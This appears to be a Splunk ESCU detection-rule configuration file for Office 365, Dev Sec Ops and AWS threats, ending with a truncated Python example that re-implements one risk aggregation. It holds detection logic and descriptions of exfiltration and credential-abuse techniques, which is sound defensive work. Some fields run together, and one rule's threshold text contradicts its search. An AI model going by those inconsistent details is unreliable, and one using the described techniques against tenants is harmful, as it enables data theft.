action.escu.full_search_name = ESCU - O365 PST export alert - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Collection Techniques", "Data Exfiltration"]
action.risk = 1
action.risk.param._risk_message = User $Source$ has exported a PST file from the search using this operation- $Operation$ with a severity of $Severity$
action.risk.param._risk = [{"risk_object_field": "Source", "risk_object_type": "other", "risk_score": 48}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 PST export alert - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects instances where a user has initiated an eDiscovery search or exported a PST file from the search results in an Office 365 environment. The detection leverages the Office 365 management activity logs, specifically filtering for events categorized under ThreatManagement with the name eDiscovery search started or exported. The initiation of an eDiscovery search or the export of a PST file can be indicative of data exfiltration attempts or unauthorized access to sensitive information. PST files often contain a wealth of sensitive data, including the content of emails. Monitoring for such activities is crucial as they can expose sensitive organizational communications and data. If confirmed as a malicious activity, it suggests that an attacker or insider threat is attempting to gather or exfiltrate data. This can lead to data breaches, loss of intellectual property, or unauthorized access to confidential communications. Immediate investigation is required to determine the scope and intent of the activity and to take appropriate remedial actions.
action.notable.param.rule_title = O365 PST export alert
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Category=ThreatManagement Name="eDiscovery search started or exported" | stats count earliest(_time) as firstTime latest(_time) as lastTime by Source Severity AlertEntityId Operation Name |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_pst_export_alert_filter`

[ESCU - O365 Security And Compliance Alert Triggered - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following detection is tailored to identify and act upon alerts generated by the Office 365 Security and Compliance Center, encompassing a broad spectrum of security and compliance issues indicative of potential threats or policy violations within the O365 workspace.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.004"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following detection is tailored to identify and act upon alerts generated by the Office 365 Security and Compliance Center, encompassing a broad spectrum of security and compliance issues indicative of potential threats or policy violations within the O365 workspace.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = O365 Security and Compliance may also generate false positives or trigger on legitimate behavior, filter as needed.
action.escu.creation_date = 2024-03-25
action.escu.modification_date = 2024-03-25
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Security And Compliance Alert Triggered - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Account Takeover"]
action.risk = 1
action.risk.param._risk_message = Security and Compliance triggered an alert for $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Security And Compliance Alert Triggered - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following detection is tailored to identify and act upon alerts generated by the Office 365 Security and Compliance Center, encompassing a broad spectrum of security and compliance issues indicative of potential threats or policy violations within the O365 workspace.
action.notable.param.rule_title = O365 Security And Compliance Alert Triggered
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=SecurityComplianceCenter Category=ThreatManagement Operation=AlertTriggered | spath input=Data path=f3u output=user | spath input=Data path=op output=operation | spath input=_raw path=wl | spath input=Data path=rid output=rule_id | spath input=Data path=ad output=alert_description | spath input=Data path=lon output=operation_name | spath input=Data path=an output=alert_name | spath input=Data path=sev output=severity | stats count earliest(_time) as firstTime latest(_time) as lastTime by user, Name, operation, rule_id, alert_description, alert_name, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_security_and_compliance_alert_triggered_filter`

[ESCU - O365 Service Principal New Client Credentials - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the addition of new credentials for Service Principals in addition to existing legitimate credentials within an Office 365 tenant. These credentials include both x509 certificates and passwords. It leverages O365 audit logs, specifically events related to credential modifications or additions within the AzureActiveDirectory workload for service principals. Service principals represent application identities in Office 365 / AzureAD, and their credentials allow applications to authenticate and access resources. Adding new credentials or modifying existing ones can be an indication of configuration changes, but it can also be a sign of malicious intent. If an attacker successfully adds or modifies credentials for a service principal, they can potentially use those credentials to authenticate as the application, gaining access to resources and data the application is permitted to access. This can lead to unauthorized data access, data exfiltration, or malicious operations performed under the guise of the application.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the addition of new credentials for Service Principals in addition to existing legitimate credentials within an Office 365 tenant. These credentials include both x509 certificates and passwords. It leverages O365 audit logs, specifically events related to credential modifications or additions within the AzureActiveDirectory workload for service principals. Service principals represent application identities in Office 365 / AzureAD, and their credentials allow applications to authenticate and access resources. Adding new credentials or modifying existing ones can be an indication of configuration changes, but it can also be a sign of malicious intent. If an attacker successfully adds or modifies credentials for a service principal, they can potentially use those credentials to authenticate as the application, gaining access to resources and data the application is permitted to access. This can lead to unauthorized data access, data exfiltration, or malicious operations performed under the guise of the application.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Service Principal client credential modifications may be part of legitimate administrative operations. Filter as needed.
action.escu.creation_date = 2023-08-31
action.escu.modification_date = 2023-08-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Service Principal New Client Credentials - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = New credentials added for Service Principal $object$
action.risk.param._risk = [{"risk_object_field": "object", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Service Principal New Client Credentials - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the addition of new credentials for Service Principals in addition to existing
legitimate credentials within a Office 365 tenant. These credentials include both x509 certificates and passwords. It leverages O365 audit logs, specifically events related to credential modifications or additions within the AzureActiveDirectory workload for service principals. Service principals represent application identities in Office 365 / AzureAD, and their credentials allow applications to authenticate and access resources. Adding new credentials or modifying existing ones can be an indication of configuration changes, but it can also be a sign of malicious intent If an attacker successfully adds or modifies credentials for a service principal, they can potentially use those credentials to authenticate as the application, gaining access to resources and data the application is permitted to access. This can lead to unauthorized data access, data exfiltration, or malicious operations performed under the guise of the application action.notable.param.rule_title = O365 Service Principal New Client Credentials action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Update application*Certificates and secrets management " | stats earliest(_time) as firstTime latest(_time) as lastTime by user ModifiedProperties{}.NewValue object ObjectId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_service_principal_new_client_credentials_filter` [ESCU - O365 Tenant Wide Admin Consent Granted - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where admin consent is granted to an application within an Azure AD and Office 365 tenant. 
It leverages O365 audit logs, specifically events related to the admin consent action within the AzureActiveDirectory workload. The admin consent action allows applications to access data across the entire tenant, potentially encompassing a vast amount of organizational data. Given its broad scope and the sensitivity of some permissions that can only be granted via admin consent, it's crucial to monitor this action. Unauthorized or inadvertent granting of admin consent can lead to significant security risks, including data breaches, unauthorized data access, and potential compliance violations. If an attacker successfully tricks an administrator into granting admin consent to a malicious or compromised application, they can gain extensive and persistent access to organizational data. This can lead to data exfiltration, espionage, further malicious activities within the tenant, and potential breaches of compliance regulations action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where admin consent is granted to an application within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to the admin consent action within the AzureActiveDirectory workload. The admin consent action allows applications to access data across the entire tenant, potentially encompassing a vast amount of organizational data. Given its broad scope and the sensitivity of some permissions that can only be granted via admin consent, it's crucial to monitor this action. Unauthorized or inadvertent granting of admin consent can lead to significant security risks, including data breaches, unauthorized data access, and potential compliance violations. 
If an attacker successfully tricks an administrator into granting admin consent to a malicious or compromised application, they can gain extensive and persistent access to organizational data. This can lead to data exfiltration, espionage, further malicious activities within the tenant, and potential breaches of compliance regulations action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Legitimate applications may be granted tenant wide consent, filter as needed. action.escu.creation_date = 2023-09-06 action.escu.modification_date = 2023-09-06 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Tenant Wide Admin Consent Granted - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = The $object$ application registration was granted tenant wide admin consent. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Tenant Wide Admin Consent Granted - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where admin consent is granted to an application within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to the admin consent action within the AzureActiveDirectory workload. The admin consent action allows applications to access data across the entire tenant, potentially encompassing a vast amount of organizational data. Given its broad scope and the sensitivity of some permissions that can only be granted via admin consent, it's crucial to monitor this action. Unauthorized or inadvertent granting of admin consent can lead to significant security risks, including data breaches, unauthorized data access, and potential compliance violations. If an attacker successfully tricks an administrator into granting admin consent to a malicious or compromised application, they can gain extensive and persistent access to organizational data. 
This can lead to data exfiltration, espionage, further malicious activities within the tenant, and potential breaches of compliance regulations action.notable.param.rule_title = O365 Tenant Wide Admin Consent Granted action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation="Consent to application." | eval new_field=mvindex('ModifiedProperties{}.NewValue', 4) | rex field=new_field "ConsentType: (?[^\,]+)" | rex field=new_field "Scope: (?[^\,]+)" | search ConsentType = "AllPrincipals" | stats count min(_time) as firstTime max(_time) as lastTime by Operation, user, object, ObjectId, ConsentType, Scope | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_tenant_wide_admin_consent_granted_filter` [ESCU - O365 User Consent Blocked for Risky Application - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where Office 365 has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This suggests that the application has exhibited behaviors or characteristics that are commonly associated with malicious intent or poses a security risk. This detection leverages the O365 audit logs, specifically focusing on events related to user consent actions and system-driven blocks. By filtering for blocked consent actions associated with applications, the analytic highlights instances where O365's built-in security measures have intervened. Applications that are flagged and blocked by O365 typically exhibit suspicious characteristics or behaviors. 
Monitoring for these blocked consent attempts helps security teams identify potential threats early on and can provide insights into users who might be targeted or susceptible to such risky applications. It's an essential layer of defense in ensuring that malicious or risky applications don't gain access to organizational data. If the detection is a true positive, it indicates that the built-in security measures of O365 successfully prevented a potentially harmful application from gaining access. However, the attempt itself suggests that either a user might be targeted or that there's a presence of malicious applications trying to infiltrate the organization. Immediate investigation is required to understand the context of the block and to take further preventive measures. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The following analytic identifies instances where Office 365 has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This suggests that the application has exhibited behaviors or characteristics that are commonly associated with malicious intent or poses a security risk. This detection leverages the O365 audit logs, specifically focusing on events related to user consent actions and system-driven blocks. By filtering for blocked consent actions associated with applications, the analytic highlights instances where O365's built-in security measures have intervened. Applications that are flagged and blocked by O365 typically exhibit suspicious characteristics or behaviors. Monitoring for these blocked consent attempts helps security teams identify potential threats early on and can provide insights into users who might be targeted or susceptible to such risky applications. 
It's an essential layer of defense in ensuring that malicious or risky applications don't gain access to organizational data. If the detection is a true positive, it indicates that the built-in security measures of O365 successfully prevented a potentially harmful application from gaining access. However, the attempt itself suggests that either a user might be targeted or that there's a presence of malicious applications trying to infiltrate the organization. Immediate investigation is required to understand the context of the block and to take further preventive measures. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Microsofts algorithm to identify risky applications is unknown and may flag legitimate applications. action.escu.creation_date = 2023-10-11 action.escu.modification_date = 2023-10-11 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 User Consent Blocked for Risky Application - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = O365 has blocked $user$ attempt to grant to consent to an application deemed risky. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 User Consent Blocked for Risky Application - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 100, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where Office 365 has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This suggests that the application has exhibited behaviors or characteristics that are commonly associated with malicious intent or poses a security risk. This detection leverages the O365 audit logs, specifically focusing on events related to user consent actions and system-driven blocks. By filtering for blocked consent actions associated with applications, the analytic highlights instances where O365's built-in security measures have intervened. Applications that are flagged and blocked by O365 typically exhibit suspicious characteristics or behaviors. Monitoring for these blocked consent attempts helps security teams identify potential threats early on and can provide insights into users who might be targeted or susceptible to such risky applications. It's an essential layer of defense in ensuring that malicious or risky applications don't gain access to organizational data. If the detection is a true positive, it indicates that the built-in security measures of O365 successfully prevented a potentially harmful application from gaining access. 
However, the attempt itself suggests that either a user might be targeted or that there's a presence of malicious applications trying to infiltrate the organization. Immediate investigation is required to understand the context of the block and to take further preventive measures. action.notable.param.rule_title = O365 User Consent Blocked for Risky Application action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Consent to application." ResultStatus=Failure | eval permissions =mvindex('ModifiedProperties{}.NewValue', 4) | eval reason =mvindex('ModifiedProperties{}.NewValue', 5) | search reason = "Risky application detected" | rex field=permissions "Scope: (?[^,]+)" | stats max(_time) as lastTime by Operation, user, reason, object, Scope | `security_content_ctime(lastTime)` | `o365_user_consent_blocked_for_risky_application_filter` [ESCU - O365 User Consent Denied for OAuth Application - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where a user has actively denied consent to an OAuth application seeking permissions within the Office 365 environment. This suggests that the user either recognized something suspicious about the application or chose not to grant it the requested permissions for other reasons. This detection leverages the O365 audit logs, specifically focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, the analytic captures instances where users have actively rejected permission requests. While user-denied consents can be routine, they can also be indicative of users spotting potentially suspicious or unfamiliar applications. 
By monitoring these denied consent attempts, security teams can gain insights into applications that might be perceived as risky or untrusted by users. It can also serve as a feedback loop for security awareness training, indicating that users are being cautious about granting permissions. If the detection is a true positive, it indicates that a user has actively prevented an OAuth application from gaining the permissions it requested. While this is a proactive security measure on the user's part, it's essential for security teams to review the context of the denial. Understanding why certain applications are being denied can help in refining application whitelisting policies and ensuring that no malicious applications are attempting to gain access. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where a user has actively denied consent to an OAuth application seeking permissions within the Office 365 environment. This suggests that the user either recognized something suspicious about the application or chose not to grant it the requested permissions for other reasons. This detection leverages the O365 audit logs, specifically focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, the analytic captures instances where users have actively rejected permission requests. While user-denied consents can be routine, they can also be indicative of users spotting potentially suspicious or unfamiliar applications. By monitoring these denied consent attempts, security teams can gain insights into applications that might be perceived as risky or untrusted by users. It can also serve as a feedback loop for security awareness training, indicating that users are being cautious about granting permissions. 
If the detection is a true positive, it indicates that a user has actively prevented an OAuth application from gaining the permissions it requested. While this is a proactive security measure on the user's part, it's essential for security teams to review the context of the denial. Understanding why certain applications are being denied can help in refining application whitelisting policies and ensuring that no malicious applications are attempting to gain access. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 events. action.escu.known_false_positives = OAuth applications that require mail permissions may be legitimate, investigate and filter as needed. action.escu.creation_date = 2023-10-12 action.escu.modification_date = 2023-10-12 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 User Consent Denied for OAuth Application - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ denifed consent for an OAuth application. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 User Consent Denied for OAuth Application - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 100, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where a user has actively denied consent to an OAuth application seeking permissions within the Office 365 environment. This suggests that the user either recognized something suspicious about the application or chose not to grant it the requested permissions for other reasons. This detection leverages the O365 audit logs, specifically focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, the analytic captures instances where users have actively rejected permission requests. While user-denied consents can be routine, they can also be indicative of users spotting potentially suspicious or unfamiliar applications. By monitoring these denied consent attempts, security teams can gain insights into applications that might be perceived as risky or untrusted by users. It can also serve as a feedback loop for security awareness training, indicating that users are being cautious about granting permissions. If the detection is a true positive, it indicates that a user has actively prevented an OAuth application from gaining the permissions it requested. 
While this is a proactive security measure on the user's part, it's essential for security teams to review the context of the denial. Understanding why certain applications are being denied can help in refining application whitelisting policies and ensuring that no malicious applications are attempting to gain access. action.notable.param.rule_title = O365 User Consent Denied for OAuth Application action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_graph` status.errorCode=65004 | rename userPrincipalName as user | rename ipAddress as src_ip | stats max(_time) as lastTime by user src_ip appDisplayName status.failureReason | `security_content_ctime(lastTime)` | `o365_user_consent_denied_for_oauth_application_filter` [ESCU - Risk Rule for Dev Sec Ops by Repository - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects by correlating repository and risk score to identify patterns and trends in the data based on the level of risk associated. The analytic adds any null values and calculates the sum of the risk scores for each detection. Then, the analytic captures the source and user information for each detection and sorts the results in ascending order based on the risk score. Finally, the analytic filters the detections with a risk score below 80 and focuses only on high-risk detections.This detection is important because it provides valuable insights into the distribution of high-risk activities across different repositories. It also identifies the most vulnerable repositories that are frequently targeted by potential threats. Additionally, it proactively detects and responds to potential threats, thereby minimizing the impact of attacks and safeguarding critical assets. 
Finally, it provides a comprehensive view of the risk landscape and helps to make informed decisions to protect the organization's data and infrastructure. False positives might occur so it is important to identify the impact of the attack and prioritize response and mitigation efforts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The following analytic detects by correlating repository and risk score to identify patterns and trends in the data based on the level of risk associated. The analytic adds any null values and calculates the sum of the risk scores for each detection. Then, the analytic captures the source and user information for each detection and sorts the results in ascending order based on the risk score. Finally, the analytic filters the detections with a risk score below 80 and focuses only on high-risk detections.This detection is important because it provides valuable insights into the distribution of high-risk activities across different repositories. It also identifies the most vulnerable repositories that are frequently targeted by potential threats. Additionally, it proactively detects and responds to potential threats, thereby minimizing the impact of attacks and safeguarding critical assets. Finally, it provides a comprehensive view of the risk landscape and helps to make informed decisions to protect the organization's data and infrastructure. False positives might occur so it is important to identify the impact of the attack and prioritize response and mitigation efforts. action.escu.how_to_implement = Ensure that all relevant detections in the Dev Sec Ops analytic stories are enabled and are configured to create risk events in Enterprise Security. 
action.escu.known_false_positives = Unknown
action.escu.creation_date = 2023-10-27
action.escu.modification_date = 2023-10-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Risk Rule for Dev Sec Ops by Repository - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Dev Sec Ops"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - RIR - Risk Rule for Dev Sec Ops by Repository - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic aggregates risk events from the Dev Sec Ops analytic story by the repository they were attributed to (risk objects of type "other"), together with the risk object type and the MITRE ATT&CK tactic of the contributing detections. For each group it records the first and last event time, sums the calculated risk scores, collects the contributing detection sources and technique IDs, and counts the distinct sources and techniques. It then keeps only groups with more than three distinct detection sources and a summed risk score above 100, so that no single detection can raise a notable on its own. This correlation is important because it shows which repositories accumulate high-risk findings across several independent detections, a stronger signal of targeting or compromise than any one detection, and lets responders prioritize those repositories. False positives are possible, so review the contributing detections and establish the impact before responding.
action.notable.param.rule_title = RBA: Risk Rule for Dev Sec Ops by Repository
action.notable.param.security_domain = cloud
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as sum_risk_score, values(All_Risk.annotations.mitre_attack.mitre_tactic) as annotations.mitre_attack.mitre_tactic, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.analyticstories="Dev Sec Ops" All_Risk.risk_object_type = "other" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count > 3 and sum_risk_score > 100 | `risk_rule_for_dev_sec_ops_by_repository_filter`

[ESCU - Abnormally High AWS Instances Launched by User - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events where a user successfully launches an abnormally high number of instances. This search is deprecated and has been translated to use the latest Change data model.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events where a user successfully launches an abnormally high number of instances. This search is deprecated and has been translated to use the latest Change data model.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. The threshold value should be tuned to your environment.
action.escu.known_false_positives = Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.
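The aggregation that the `ESCU - Risk Rule for Dev Sec Ops by Repository` tstats search above performs, re-implemented in Python as an added example; this is not Splunk's code and is not part of the ESCU content. It runs offline over constructed risk events whose field names follow the `Risk.All_Risk` data model; the repository names, detection source names, scores and timestamps are invented.

```python
from collections import defaultdict

# Constructed risk events shaped like Risk.All_Risk rows. In production these are
# written to the risk index by other detections; the names below are invented.
SAMPLE_RISK_EVENTS = [
    # repo A: four distinct detections, one tactic, summed score 115 -> should fire
    {"_time": 1713390000, "risk_object": "github.com/acme/payments", "risk_object_type": "other",
     "analyticstories": ["Dev Sec Ops"], "calculated_risk_score": 30, "source": "Dependency Alert (constructed)",
     "mitre_tactic": "initial-access", "mitre_technique_id": "T1195.001"},
    {"_time": 1713390600, "risk_object": "github.com/acme/payments", "risk_object_type": "other",
     "analyticstories": ["Dev Sec Ops"], "calculated_risk_score": 30, "source": "Secret Scanning Alert (constructed)",
     "mitre_tactic": "initial-access", "mitre_technique_id": "T1552"},
    {"_time": 1713391200, "risk_object": "github.com/acme/payments", "risk_object_type": "other",
     "analyticstories": ["Dev Sec Ops"], "calculated_risk_score": 30, "source": "Malicious Commit (constructed)",
     "mitre_tactic": "initial-access", "mitre_technique_id": "T1204.003"},
    {"_time": 1713391800, "risk_object": "github.com/acme/payments", "risk_object_type": "other",
     "analyticstories": ["Dev Sec Ops"], "calculated_risk_score": 25, "source": "Workflow Tampering (constructed)",
     "mitre_tactic": "initial-access", "mitre_technique_id": "T1195.001"},
    # repo B: four sources but low scores (summed 40) -> below the score threshold
    *({"_time": 1713390000 + i, "risk_object": "github.com/acme/website", "risk_object_type": "other",
       "analyticstories": ["Dev Sec Ops"], "calculated_risk_score": 10, "source": f"Detection {i} (constructed)",
       "mitre_tactic": "initial-access", "mitre_technique_id": "T1195.001"} for i in range(4)),
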